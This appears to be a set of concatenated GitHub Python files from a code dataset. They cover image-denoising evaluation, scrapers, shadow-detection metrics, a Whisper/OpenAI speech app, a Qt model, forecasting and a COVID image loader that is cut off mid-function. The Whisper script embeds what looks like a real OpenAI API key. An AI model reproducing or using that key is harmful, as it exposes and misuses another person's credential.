'{}_{:.2f}.png'.format(frame_id, res_in['PSNR']))):\r\n Image.fromarray(input.astype(np.uint8)).save(join(savedir, name, 'input', '{}_{:.2f}.png'.format(frame_id, res_in['PSNR'])))\r\n\r\n if not os.path.exists(join(savedir, name, 'label')):\r\n os.makedirs(join(savedir, name, 'label')) \r\n\r\n if not os.path.exists(join(savedir, name, 'label', '{}.png'.format(frame_id))):\r\n 
Image.fromarray(target.astype(np.uint8)).save(join(savedir, name, 'label', '{}.png'.format(frame_id)))\r\n else:\r\n if suffix is not None:\r\n Image.fromarray(output.astype(np.uint8)).save(join(savedir, name,'{}_{:.1f}_{}.png'.format(self.opt.name, res['PSNR'], suffix)))\r\n # Image.fromarray(output.astype(np.uint8)).save(join(savedir, name,'{}_{:.1f}_{}.jpg'.format(self.opt.name, res['PSNR'], suffix)), optimize=True, quality=90)\r\n Image.fromarray(input.astype(np.uint8)).save(join(savedir, name, 'm_input_{}.png'.format(suffix)))\r\n # Image.fromarray(input.astype(np.uint8)).save(join(savedir, name, 'm_input_{}.jpg'.format(suffix)), optimize=True, quality=90)\r\n else:\r\n # Image.fromarray(output.astype(np.uint8)).save(join(savedir, name, '{}_{:.1f}.jpg'.format(self.opt.name, res['PSNR'])), optimize=True, quality=90)\r\n Image.fromarray(output.astype(np.uint8)).save(join(savedir, name, '{}_{:.2f}_{:.2f}.png'.format(self.opt.model_path.split(\"/\")[-2], res['PSNR'], res['SSIM'])))\r\n # Image.fromarray(output.astype(np.uint8)).save(join(savedir, name, '{}.png'.format(self.opt.name)))\r\n Image.fromarray(input.astype(np.uint8)).save(join(savedir, name, 'm_input_{:.2f}_{:.2f}.png'.format(res_in['PSNR'], res_in['SSIM'])))\r\n # Image.fromarray(input.astype(np.uint8)).save(join(savedir, name, 'm_input.jpg'), optimize=True, quality=90)\r\n \r\n Image.fromarray(target.astype(np.uint8)).save(join(savedir, name, 't_label.png'))\r\n # Image.fromarray(target.astype(np.uint8)).save(join(savedir, name, 't_label.jpg'), optimize=True, quality=90)\r\n\r\n return res\r\n\r\n def test(self, data, savedir=None, video_mode=False):\r\n # only the 1st input of the whole minibatch would be evaluated\r\n self._eval()\r\n self.set_input(data, 'test')\r\n\r\n if self.data_name is not None and savedir is not None:\r\n name = os.path.splitext(os.path.basename(self.data_name[0]))[0]\r\n if not video_mode:\r\n if not os.path.exists(join(savedir, name)):\r\n os.makedirs(join(savedir, name))\r\n\r\n # if os.path.exists(join(savedir, name, '{}.png'.format(self.opt.name))):\r\n for fn in os.listdir(join(savedir, name)):\r\n if fnmatch.fnmatch(fn, '*{}_*'.format(self.opt.name)):\r\n return\r\n else:\r\n if not os.path.exists(join(savedir, self.opt.name)):\r\n os.makedirs(join(savedir, self.opt.name))\r\n \r\n with torch.no_grad():\r\n output = self.forward()\r\n \r\n # if self.opt.netG == 'fastdvd': # video network \r\n # self.input = self.input[:, 8:12, ...]\r\n\r\n ## raw postprocessing\r\n if self.rawpath:\r\n if self.opt.stage_in == 'srgb':\r\n output = tensor2im(self.output)\r\n input = tensor2im(self.input)\r\n else:\r\n output = postprocess_bayer(self.rawpath, self.output)\r\n input = postprocess_bayer(self.rawpath, self.input) \r\n\r\n if not video_mode:\r\n Image.fromarray(output.astype(np.uint8)).save(join(savedir, name,'{}.jpg'.format(self.opt.name)), optimize=True, quality=90)\r\n Image.fromarray(input.astype(np.uint8)).save(join(savedir, name, 'm_input.jpg'), optimize=True, quality=90)\r\n else:\r\n Image.fromarray(output.astype(np.uint8)).save(join(savedir, self.opt.name,'{}.jpg'.format(name)), optimize=True, quality=90)\r\n\r\n return output","repo_name":"mm2319/Test","sub_path":"denoising-diffusion-gan/ELD_model.py","file_name":"ELD_model.py","file_ext":"py","file_size_in_byte":18722,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19249063650","text":"import numpy as np\nimport pandas as pd\nimport cv2\nimport random\nimport os\nimport 
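# (On siamese_fetch_img below: kind=1 samples an image with the same label
# and kind=0 one with a different label, returning the image array plus a
# one-hot row vector over the 5005 whale-identity classes.)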
matplotlib.pyplot as plt\npath = './data/5005labels.csv'\nha = pd.read_csv(open(path))\nid = 0\ndef imgarr(imgpath):\n img=cv2.imread(imgpath)\n return img\n\ndef siamese_fetch_img(BASE_DIR,label,labeldata,pathdata,kind):\n if(kind==0):\n pathdata1=pathdata[labeldata!=label]\n # print('pathdata1:',pathdata1)\n\n else:\n pathdata1=pathdata[labeldata==label]\n # print('pathdata1:', pathdata1)\n rndid=random.randint(0,len(pathdata1)-1)\n path=BASE_DIR+labeldata[pathdata1.index[rndid]]+'\\\\'+pathdata1[pathdata1.index[rndid]]\n id = ha[ha['labels'] == labeldata[pathdata1.index[rndid]]]['Id'].iloc[0]\n label = np.zeros((1, 5005))\n label[0, id] = 1\n # print('po ne label:',id)\n # print(path)\n # print(os.path.exists(path))\n img=imgarr(path)\n return img,label\n\n","repo_name":"PengLiuRu/Humpback-whale-identification","sub_path":"fectchimage.py","file_name":"fectchimage.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11167378201","text":"# -*- coding: utf-8 -*-\n\n# Define here the models for your scraped items\n#\n# See documentation in:\n# http://doc.scrapy.org/en/latest/topics/items.html\n\nimport scrapy\n\n\nclass EdxSpiderItem(scrapy.Item):\n language = Field()\n title = Field()\n shortdes = Field()\n url = Field()\n level = Field()\n image = Field()\n weektocomplete = Field()\n org = Field()\n key = Field()\n instructorsname = Field()\n instructorsposition = Field()\n instructorsorg = Field()\n instructorsimage = Field()\n prerequisites = Field()\n syllabus = Field()\n whatyouwilllearn = Field()\n","repo_name":"mexi-messi/abcdef","sub_path":"itec-core/Crawl Robot/edx_spider/edx_spider/items.py","file_name":"items.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19493412485","text":"import numpy as np\r\nimport os\r\nfrom PIL import Image\r\nfrom tqdm import tqdm\r\nfrom medpy import metric\r\nimport argparse\r\n\r\n\r\nclass AvgMeter(object):\r\n def __init__(self):\r\n self.reset()\r\n\r\n def reset(self):\r\n self.val = 0\r\n self.avg = 0\r\n self.sum = 0\r\n self.count = 0\r\n\r\n def update(self, val, n=1):\r\n self.val = val\r\n self.sum += val * n\r\n self.count += n\r\n self.avg = self.sum / self.count\r\n\r\ndef cal_precision_recall_mae(prediction, gt):\r\n assert prediction.dtype == np.uint8\r\n assert gt.dtype == np.uint8\r\n assert prediction.shape == gt.shape\r\n\r\n eps = 1e-4\r\n\r\n prediction = prediction / 255.\r\n gt = gt / 255.\r\n\r\n prediction_bool = (prediction > 0.5)\r\n gt_bool = (gt > 0.5)\r\n prediction_bool = prediction_bool.astype(np.float)\r\n gt_bool = gt_bool.astype(np.float)\r\n\r\n mae = np.mean(np.abs(prediction_bool - gt_bool))\r\n\r\n hard_gt = np.zeros(prediction.shape)\r\n hard_gt[gt > 0.5] = 1\r\n t = np.sum(hard_gt)\r\n\r\n precision, recall = [], []\r\n for threshold in range(256):\r\n threshold = threshold / 255.\r\n\r\n hard_prediction = np.zeros(prediction.shape)\r\n hard_prediction[prediction > threshold] = 1\r\n\r\n tp = np.sum(hard_prediction * hard_gt)\r\n p = np.sum(hard_prediction)\r\n\r\n precision.append((tp + eps) / (p + eps))\r\n recall.append((tp + eps) / (t + eps))\r\n\r\n return precision, recall, mae\r\n\r\ndef cal_fmeasure(precision, recall):\r\n assert len(precision) == 256\r\n assert len(recall) == 256\r\n beta_square = 0.3\r\n max_fmeasure = max([(1 + beta_square) * p * r / (beta_square * p + r) for p, r in 
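# This max over the 256 thresholds implements
# F_beta = (1 + beta^2) * P * R / (beta^2 * P + R) with beta^2 = 0.3, the
# weighting conventionally used in saliency / shadow-detection benchmarks.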
zip(precision, recall)])\r\n\r\n return max_fmeasure\r\n\r\ndef cal_Jaccard(prediction, gt):\r\n assert prediction.dtype == np.uint8\r\n assert gt.dtype == np.uint8\r\n assert prediction.shape == gt.shape\r\n\r\n prediction = prediction / 255.\r\n gt = gt / 255.\r\n\r\n pred = (prediction > 0.5)\r\n gt = (gt > 0.5)\r\n Jaccard = metric.binary.jc(pred, gt)\r\n\r\n return Jaccard\r\n\r\ndef cal_BER(prediction, label, thr = 128):\r\n prediction = (prediction > thr)\r\n label = (label > thr)\r\n prediction_tmp = prediction.astype(np.float)\r\n label_tmp = label.astype(np.float)\r\n TP = np.sum(prediction_tmp * label_tmp)\r\n TN = np.sum((1 - prediction_tmp) * (1 - label_tmp))\r\n Np = np.sum(label_tmp)\r\n Nn = np.sum((1-label_tmp))\r\n BER = 0.5 * (2 - TP / Np - TN / Nn) * 100\r\n shadow_BER = (1 - TP / Np) * 100\r\n non_shadow_BER = (1 - TN / Nn) * 100\r\n \r\n return BER, shadow_BER, non_shadow_BER\r\n\r\nif __name__ == '__main__':\r\n\r\n parser = argparse.ArgumentParser(description='PyTorch Training')\r\n\r\n parser.add_argument('-gp', '--gt_path', type=str, default='./data/DS/test/')\r\n parser.add_argument('-pp', '--pred_path', type=str, default='./result/MTMT-SSL/DS/')\r\n parser.set_defaults(bottleneck=True)\r\n args = parser.parse_args()\r\n\r\n gt_path = args.gt_path\r\n pred_path = args.pred_path \r\n\r\n print('evalute the predictions: ', pred_path)\r\n\r\n precision_record, recall_record, = [AvgMeter() for _ in range(256)], [AvgMeter() for _ in range(256)]\r\n mae_record = AvgMeter()\r\n Jaccard_record = AvgMeter()\r\n BER_record = AvgMeter()\r\n shadow_BER_record = AvgMeter()\r\n non_shadow_BER_record = AvgMeter()\r\n\r\n video_list = os.listdir(pred_path)\r\n\r\n for video in tqdm(video_list):\r\n gt_list = os.listdir(os.path.join(gt_path, 'labels', video)) \r\n img_list = [f for f in os.listdir(os.path.join(pred_path, video))] \r\n img_set = list(set([img.split('/')[-1] for img in img_list])) \r\n for img_prefix in img_set:\r\n\r\n gt = np.array(Image.open(os.path.join(gt_path, 'labels', video, img_prefix)).convert('L'))\r\n\r\n width, height = gt.shape\r\n img = np.array(Image.open(os.path.join(pred_path, video, img_prefix)).convert('L').resize((height, width)))\r\n\r\n if 'DS' in gt_path:\r\n device = np.array(Image.open(os.path.join(gt_path, 'devices', video, img_prefix)).convert('L'))\r\n img = img * ((255 - device)//255)\r\n gt = gt * ((255 - device)//255)\r\n\r\n precision, recall, mae = cal_precision_recall_mae(img, gt)\r\n Jaccard = cal_Jaccard(img, gt)\r\n Jaccard_record.update(Jaccard)\r\n BER, shadow_BER, non_shadow_BER = cal_BER(img, gt)\r\n BER_record.update(BER)\r\n shadow_BER_record.update(shadow_BER)\r\n non_shadow_BER_record.update(non_shadow_BER)\r\n for pidx, pdata in enumerate(zip(precision, recall)):\r\n p, r = pdata\r\n precision_record[pidx].update(p)\r\n recall_record[pidx].update(r)\r\n mae_record.update(mae)\r\n\r\n fmeasure = cal_fmeasure([precord.avg for precord in precision_record],\r\n [rrecord.avg for rrecord in recall_record])\r\n log = 'MAE:{:.3f}, F-beta:{:.3f}, Jaccard:{:.3f}, BER:{:.2f}, SBER:{:.2f}, non-SBER:{:.2f}'.format(mae_record.avg, fmeasure, Jaccard_record.avg, BER_record.avg, shadow_BER_record.avg, non_shadow_BER_record.avg)\r\n print(log)\r\n\r\n\r\n","repo_name":"yihong-97/STICT","sub_path":"evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":5178,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"72"} +{"seq_id":"74309974632","text":"import whisper\r\nimport 
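# (transcribe below follows the standard Whisper flow: load_audio, pad or
# trim to 30 seconds, log-Mel spectrogram, language detection, then decoding
# with fp16 disabled; the recognized text is forwarded to the OpenAI
# completion endpoint.)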
gradio as gr\r\nimport warnings\r\nimport openai\r\n\r\n\r\nwarnings.filterwarnings(\"ignore\")\r\n\r\n# Use your API key to authenticate\r\nopenai.api_key = \"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\"\r\n\r\nmodel = whisper.load_model(\"base\")\r\n\r\nmodel.device\r\n\r\ndef transcribe(audio):\r\n # load audio and pad/trim it to fit 30 seconds\r\n audio=whisper.load_audio(audio)\r\n audio=whisper.pad_or_trim(audio)\r\n\r\n # make log-Mel spectrogram and move to the same device as the model\r\n mel = whisper.log_mel_spectrogram(audio).to(model.device)\r\n\r\n # detect the spoken language\r\n _, probs = model.detect_language(mel)\r\n\r\n # decode the audio\r\n #options = whisper.DecodingOptions()\r\n options = whisper.DecodingOptions(fp16=False)\r\n result = whisper.decode(model, mel, options)\r\n result_text = result.text\r\n\r\n # Pass the generated text to Audio\r\n # Use the openai API to generate a response\r\n response = openai.Completion.create(\r\n engine=\"ada\",\r\n prompt=result_text,\r\n max_tokens=1024,\r\n n=1,\r\n temperature=0.5\r\n ).choices[0].text\r\n\r\n out_result = response\r\n print(out_result)\r\n\r\n return [result_text, out_result]\r\n\r\noutput_1 = gr.Textbox(label=\"Speech to Text\")\r\noutput_2 = gr.Textbox(label=\"ChatGPT Output\")\r\n\r\ngr.Interface(\r\n title = 'OpenAI Whisper and ChatGPT ASR Gradio Web UI',\r\n fn=transcribe,\r\n inputs=[\r\n gr.inputs.Audio(source=\"microphone\", type=\"filepath\")\r\n ],\r\n\r\n outputs=[output_1, output_2],\r\n live=True).launch()","repo_name":"eddy961206/py_workspace","sub_path":"py_workspace/secretary.py","file_name":"secretary.py","file_ext":"py","file_size_in_byte":1546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"4895664718","text":"import logging\nfrom typing import Any\n\nfrom pydase.data_service.data_service import DataService\n\nlogger = logging.getLogger(__name__)\n\n\nclass NumberSlider(DataService):\n \"\"\"\n This class models a UI slider for a data service, allowing for adjustments of a\n parameter within a specified range and increments.\n\n Parameters:\n -----------\n value (float, optional):\n The initial value of the slider. Defaults to 0.\n min (float, optional):\n The minimum value of the slider. Defaults to 0.\n max (float, optional):\n The maximum value of the slider. Defaults to 100.\n step_size (float, optional):\n The increment/decrement step size of the slider. 
Defaults to 1.0.\n\n Example:\n --------\n ```python\n class MySlider(pydase.components.NumberSlider):\n def __init__(\n self,\n value: float = 0.0,\n min_: float = 0.0,\n max_: float = 100.0,\n step_size: float = 1.0,\n ) -> None:\n super().__init__(value, min_, max_, step_size)\n\n @property\n def min(self) -> float:\n return self._min\n\n @min.setter\n def min(self, value: float) -> None:\n self._min = value\n\n @property\n def max(self) -> float:\n return self._max\n\n @max.setter\n def max(self, value: float) -> None:\n self._max = value\n\n @property\n def step_size(self) -> float:\n return self._step_size\n\n @step_size.setter\n def step_size(self, value: float) -> None:\n self._step_size = value\n\n @property\n def value(self) -> float:\n return self._value\n\n @value.setter\n def value(self, value: float) -> None:\n if value < self._min or value > self._max:\n raise ValueError(\n \"Value is either below allowed min or above max value.\"\n )\n\n self._value = value\n\n class MyService(pydase.DataService):\n def __init__(self) -> None:\n self.voltage = MySlider()\n\n # Modifying or accessing the voltage value:\n my_service = MyService()\n my_service.voltage.value = 5\n print(my_service.voltage.value) # Output: 5\n ```\n \"\"\"\n\n def __init__(\n self,\n value: Any = 0.0,\n min_: float = 0.0,\n max_: float = 100.0,\n step_size: float = 1.0,\n ) -> None:\n super().__init__()\n self._step_size = step_size\n self._value = value\n self._min = min_\n self._max = max_\n\n @property\n def min(self) -> float:\n \"\"\"The min property.\"\"\"\n return self._min\n\n @property\n def max(self) -> float:\n \"\"\"The max property.\"\"\"\n return self._max\n\n @property\n def step_size(self) -> float:\n \"\"\"The step_size property.\"\"\"\n return self._step_size\n\n @property\n def value(self) -> Any:\n \"\"\"The value property.\"\"\"\n return self._value\n\n @value.setter\n def value(self, value: Any) -> None:\n self._value = value\n","repo_name":"tiqi-group/pydase","sub_path":"src/pydase/components/number_slider.py","file_name":"number_slider.py","file_ext":"py","file_size_in_byte":3080,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73818445352","text":"import geopy\nfrom geopy.distance import geodesic\nfrom pandas import DataFrame\n\nfrom src.converters.utility import convert_dist\nfrom src.interfaces.converter_interface import IConverter\nfrom src.utility import get_exception\n\nfrom src.log import get_logger\nimport re\n\n\nclass SonarPlanConverter(IConverter):\n logger = get_logger(__name__)\n\n def __init__(self):\n super().__init__()\n\n def convert(self, df: DataFrame, **kwargs) -> DataFrame:\n try:\n if kwargs['name'] == 'SONAR_PLAN_44':\n return convert_sonar_plan_44(df, kwargs['scientific_cols'])\n else:\n return df\n except Exception as e:\n self.logger.error(get_exception(e) + ' ' + kwargs['name'])\n return df\n\n\ndip_schemes = {\n '2': [\n (0, 1),\n (90, 1.5),\n (162, 2),\n (216, 2.5),\n (259, 3),\n (295, 3.5),\n (326, 4),\n (353, 4.5)\n ],\n '3': [\n (0, 1),\n (60, 2),\n (109, 3),\n (143, 4),\n (169, 5),\n (190, 6),\n (208, 7),\n (223, 8)\n ],\n '4': [\n (0, 1),\n (45, 2),\n (90, 3),\n (124, 4),\n (150, 5),\n (171, 6),\n (189, 7),\n (204, 8)\n ],\n}\n\ndip_degrees_schemes = {\n '2': (0, 180),\n '3': (0, 120, 240),\n '4': (0, 90, 180, 270)\n}\n\n\ndef convert_sonar_plan_44(df: DataFrame, scientific_cols):\n df_to_convert: DataFrame = df.copy()\n\n helis = get_dip_cols(scientific_cols)\n heli_count = str(len(helis))\n\n 
scheme = dip_schemes[heli_count]\n degrees_scheme = dip_degrees_schemes[heli_count]\n\n # For every row do:\n for i, row in df_to_convert.iterrows():\n ref_lat, ref_long = row['REF POINT LAT'], row['REF POINT LONG']\n\n current_dip = 1\n\n # For every heli do:\n for index, heli in enumerate(helis):\n dip_lat, dip_long = heli, re.sub(r'\\bX\\b', 'Y', heli)\n dip_degrees_scheme = degrees_scheme[index]\n\n # For every dip do:\n while dip_lat in list(df_to_convert.columns):\n dip_scheme = scheme[current_dip - 1]\n degrees, nm = dip_scheme[0], dip_scheme[1]\n degrees = (degrees + dip_degrees_scheme) % 360\n\n new_lat, new_long = move_geo_point(ref_lat, ref_long, degrees, nm)\n\n df_to_convert.at[i, dip_lat] = new_lat\n df_to_convert.at[i, dip_long] = new_long\n\n dip_lat = dip_lat.replace(str(current_dip), str(current_dip + 1))\n dip_long = dip_long.replace(str(current_dip), str(current_dip + 1))\n\n current_dip = current_dip + 1\n\n # go to next dip\n current_dip = 1\n\n return df_to_convert\n\n\ndef get_dip_cols(cols):\n regex_positive = re.compile('(1 *[A-Z ]* *X)')\n\n return list(filter(regex_positive.search, cols))\n\n\ndef get_dip_points(cols):\n regex_positive = re.compile(r'\\bX')\n\n return list(filter(regex_positive.search, cols))\n\n\ndef move_geo_point(lat1, lon2, b, nm):\n # given: lat1, lon1, b = bearing in degrees, nm = distance in nautical miles\n # calculates the next geo point in latitude and longitude\n\n km = convert_dist(nm, 'nm', 'km')\n origin = geopy.Point(lat1, lon2)\n destination = geodesic(kilometers=km).destination(origin, b)\n\n lat2, lon2 = destination.latitude, destination.longitude\n return lat2, lon2\n","repo_name":"jooppoelman/mer.io","sub_path":"src/converters/sonarplan_converter.py","file_name":"sonarplan_converter.py","file_ext":"py","file_size_in_byte":3412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2684890997","text":"__author__ = \"Nicola Ivanov\"\n__copyright__ = \"Copyright 2020, Johns Hopkins University\"\n__credits__ = [\"Nicola Ivanov\"]\n__license__ = \"Apache 2.0\"\n__version__ = \"0.1\"\n__maintainer__ = \"JHU-COVID-QA\"\n__email__ = \"covidqa@jhu.edu\"\n__status__ = \"Development\"\n\nimport datetime\nimport time\nimport requests\nfrom bs4 import BeautifulSoup, NavigableString, CData, Tag\nfrom covid_scraping import Conversion, Scraper\n\n\nclass DelawareGovScraper(Scraper):\n def scrape(self):\n name = 'Delaware State Government'\n url = 'https://coronavirus.delaware.gov/what-delawareans-can-do/#faqs'\n html = requests.get(url).text\n soup = BeautifulSoup(html, \"lxml\")\n\n questions = [str(q)\n for q in soup.findAll(\"h4\", {\"class\": \"panel-title\"})]\n answers = [str(a)\n for a in soup.findAll(\"div\", {\"class\": \"panel-body\"})]\n\n converter = Conversion(\n self._filename,\n self._path)\n for question, answer in zip(questions, answers):\n converter.addExample({\n 'sourceUrl': url,\n 'sourceName': name,\n \"needUpdate\": True,\n \"typeOfInfo\": \"QA\",\n \"isAnnotated\": False,\n \"responseAuthority\": \"\",\n \"question\": question,\n \"answer\": answer,\n \"hasAnswer\": True,\n \"targetEducationLevel\": \"NA\",\n \"topic\": [],\n \"extraData\": {},\n \"targetLocation\": \"Delaware\",\n \"language\": \"en\"\n })\n return converter.write()\n\n\ndef main():\n scraper = DelawareGovScraper(path='./', filename='Delaware')\n scraper.scrape()\n\n\nif __name__ == '__main__':\n 
main()\n","repo_name":"JHU-COVID-QA/scraping-qas","sub_path":"src/scraping/scrapers/delaware_gov.py","file_name":"delaware_gov.py","file_ext":"py","file_size_in_byte":1754,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"27634684035","text":"'''\nCreated on Aug 2, 2018\n\n@author: dlytle\n'''\nfrom PyQt5.QtCore import QAbstractTableModel, Qt, QModelIndex\nfrom PyQt5.QtGui import QColor\n\nclass DirectoryListModel(QAbstractTableModel):\n '''\n Given a current_directory this model backs up the other directory list.\n '''\n\n def __init__(self, current_directory):\n super(DirectoryListModel, self).__init__()\n self.current_directory = current_directory\n self.other_directories = current_directory.directories\n\n def data(self, index, role=Qt.DisplayRole):\n if (not index.isValid() or\n not (0 <= index.row() < len(self.other_directories))):\n return None\n a_directory = self.other_directories[index.row()]\n \n if role == Qt.DisplayRole:\n return a_directory.dir_name\n elif role == Qt.TextAlignmentRole:\n return int(Qt.AlignLeft|Qt.AlignVCenter)\n elif role == Qt.TextColorRole:\n return QColor(Qt.black)\n elif role == Qt.BackgroundColorRole:\n return QColor(230, 230, 230)\n return None\n \n def headerData(self, section, orientation, role=Qt.DisplayRole):\n if role == Qt.TextAlignmentRole:\n return int(Qt.AlignLeft|Qt.AlignVCenter)\n if role != Qt.DisplayRole:\n return None\n if orientation == Qt.Horizontal:\n return \"Directories\"\n return int(section)\n \n def rowCount(self, index=QModelIndex()):\n return len(self.other_directories)\n \n def columnCount(self, index=QModelIndex()):\n return 1\n","repo_name":"dyerlytle/FitsBrowse","sub_path":"FitsBrowse/src/DirectoryListModel.py","file_name":"DirectoryListModel.py","file_ext":"py","file_size_in_byte":1576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18254785850","text":"from fbprophet import Prophet\nfrom sklearn.metrics import r2_score, mean_absolute_error, mean_squared_error\n\n\ndef prophet(df_pr, y_col_name, date_col_name, pred_col_name, prediction_size=50):\n train_dataset = df_pr[:-prediction_size]\n test_dataset = df_pr[-prediction_size:]\n\n model = Prophet(weekly_seasonality=True, daily_seasonality=False)\n model.fit(train_dataset)\n future = model.make_future_dataframe(periods=prediction_size, freq='W')\n forecast = model.predict(future)\n\n r2 = r2_score(test_dataset[y_col_name], forecast[-prediction_size:]['yhat'])\n mae = mean_absolute_error(test_dataset[y_col_name], forecast[-prediction_size:]['yhat'])\n mse = mean_squared_error(test_dataset[y_col_name], forecast[-prediction_size:]['yhat'])\n return r2, mae, mse\n","repo_name":"Data-science-Folder/PricePrediction","sub_path":"modular_code/src/ML_Pipeline/prophet.py","file_name":"prophet.py","file_ext":"py","file_size_in_byte":785,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74738599592","text":"\"\"\"\nFunctions to perform string matching between labels and product names and\nlabel products accordingly.\n\"\"\"\nimport pandas as pd\nfrom nltk.metrics import distance\n\n\ndef label_prod_desc(labelled_items, item_id):\n \"\"\"Function to return the unique product descriptions for a given ons item\n\n Args:\n labelled_items (DataFrame): Pandas data frame containing\n the labelled dataset\n item_id (int): Integer number of the ons_item\n Return:\n array: product name of ons item of given 
item_id\n \"\"\"\n # find item of given id\n item = labelled_items[labelled_items[\"item_id\"] == item_id]\n return item[\"Web_product_desc\"].unique()\n\n\ndef calculate_ratio(df, prod_desc, metric, name_col=\"name\"):\n \"\"\"Function to calculate the string comparisons ratio combinations\n for all unique item descriptions and product names.\n\n Args:\n df (DataFrame): DataFrame containing data to be labelled\n prod_desc (list(str)): unique product descriptions of labelled data\n metric (function): distance metric function to be used\n name_col (str): name of the column to match to\n\n Returns:\n (DataFrame, list):\n :data with calculated ratio for all unique label names\n :list of column names of ratio values created\n \"\"\"\n # loop through product descriptions\n for i, lab in enumerate(prod_desc):\n ratio = []\n # calculate the ratio for each combination\n for name in df.loc[:, name_col]:\n\n if metric == distance.jaccard_distance:\n ratio.append(metric(set(lab.lower()), set(name.lower())))\n else:\n ratio.append(metric(lab.lower(), name.lower()))\n\n # append ratio to DataFrame\n df.loc[:, \"ratio_\" + str(i)] = ratio\n\n # column names containing the ratio values\n cols = df.keys()[(-1 * len(prod_desc)) :].tolist()\n return df, cols\n\n\ndef find_label_fuzzy(\n item_id,\n prod_desc,\n df,\n out_col=\"item_id\",\n threshold=70,\n greater=True,\n less=False,\n neg_thresh=30,\n):\n \"\"\"\n Function to apply the accepted threshold to the ratio and append labels.\n This function must be run after calculate_ratio.\n\n Args:\n item_id (int): integer id value of label to be assigned\n prod_desc (list(str)): unique product descriptions of labelled data\n df (DataFrame): DataFrame with data to be labelled, with ratios\n pre calculated using calculate_ratio\n out_col (str): the name of the output column containing the matches\n threshold (float): threshold value for accepting matches\n greater (bool): True if a greater metric value indicates a better match,\n false otherwise\n e.g. FuzzyWuzzy matching\n less (bool): True if a smaller metric value indicates a better match,\n false otherwise\n e.g. edit distance or Jaccard distance\n neg_thresh (float): the threshold for 'accepting' a match as not the item,\n i.e. a negative match\n Return:\n (DataFrame, DataFrame):\n :DataFrame containing only the matched items\n :original DataFrame with labels appended\n \"\"\"\n # Empty DataFrame to hold matches\n matched = pd.DataFrame()\n neg_match = pd.DataFrame()\n\n # For each unique labelled description check if any matches have been found\n for i in range(len(prod_desc)):\n # if metric requires greater than threshold as better - fuzzy matching\n if greater:\n matched = matched.append(\n df.loc[df[\"ratio_\" + str(i)] > threshold], ignore_index=False\n )\n\n neg_match = neg_match.append(\n df.loc[df[\"ratio_\" + str(i)] < neg_thresh], ignore_index=False\n )\n\n # if metric requires less than threshold as better - edit or Jaccard\n if less:\n\n matched = matched.append(\n df.loc[df[\"ratio_\" + str(i)] < threshold], ignore_index=False\n )\n neg_match = neg_match.append(\n df.loc[df[\"ratio_\" + str(i)] > neg_thresh], ignore_index=False\n )\n\n # drop any duplicated rows from DataFrame (i.e. 
matched to several labels)\n matched = matched.drop_duplicates()\n neg_match = neg_match.drop_duplicates()\n\n # find matched items in DataFrame and label with itemid\n df.loc[matched.index, out_col] = int(item_id)\n\n # find the negative items\n neg_index = set(neg_match.index).difference(set(matched.index))\n df.loc[neg_index, out_col] = 0\n df.loc[df[out_col].isnull(), out_col] = -1\n\n return matched, df\n","repo_name":"ONSBigData/labelpropagation_clothing","sub_path":"src/Label_matching.py","file_name":"Label_matching.py","file_ext":"py","file_size_in_byte":4729,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"21893088673","text":"import cProfile, pstats, io\n\ndef profile(fnx):\n def wrapper(*args, **kwargs):\n pr = cProfile.Profile()\n pr.enable()\n ret = fnx(*args, **kwargs)\n pr.disable()\n s = io.StringIO()\n sortby = 'cumulative'\n ps = pstats.Stats(pr, stream=s).sort_stats(sortby)\n ps.print_stats()\n print(s.getvalue())\n return ret\n\n return wrapper\n ","repo_name":"k3agan/high_performance_python","sub_path":"Profiling/profile.py","file_name":"profile.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36512162766","text":"import cv2\nimport os\nimport pickle\nimport numpy as np\n\n\nclass CovidImage:\n\n def __init__(self, path, train_file, test_file, classes=['normal', 'pneumonia', 'COVID-19'], img_size=224):\n self.path = path\n self.train_file = train_file\n self.test_file = test_file\n self.img_size = img_size\n\n self.train_images = self._process_csv_file(train_file)\n self.train_dir = os.path.join(path, \"train\")\n self.train_N = len(self.train_images)\n self.trainX = []\n self.train_y = []\n\n self.test_images = self._process_csv_file(test_file)\n self.test_dir = os.path.join(path, \"test\")\n self.test_N = len(self.test_images)\n self.testX = []\n self.test_y = []\n\n self.classes = classes\n self.class_id = {c: classes.index(c) for c in classes}\n for c in classes:\n self.class_id[c+\"\\n\"] = classes.index(c)\n\n def load_data(self):\n\n try:\n self._load_pickled_train_data()\n print('Loading training data')\n\n except:\n print('Could not find pickled traning data')\n self._process_train_set()\n\n try:\n self._load_pickled_test_data()\n print('Loading test data')\n except:\n print('Could not find pickled test data')\n self._process_test_set()\n\n print(\"Loading done\")\n\n return self.trainX, self.train_y, self.testX, self.test_y\n\n def _process_csv_file(self, file):\n with open(file, 'r') as fr:\n files = fr.readlines()\n return files\n\n def _process_train_set(self):\n print(\"Processing train set\")\n image_data = []\n c = 0\n\n for datapoint in self.train_images:\n sample = datapoint.split(\" \")\n img = sample[1]\n label = sample[2]\n c = c + 1\n if c % 1000 == 0:\n print(\"Processed {} images of {}\".format(c, self.train_N))\n img_path = os.path.join(self.train_dir, img)\n # try: # if any image is corrupted\n image_data_temp = cv2.imread(img_path, cv2.IMREAD_GRAYSCALE) # Read Image as numbers\n image_temp_resize = cv2.resize(image_data_temp, (self.img_size, self.img_size))\n 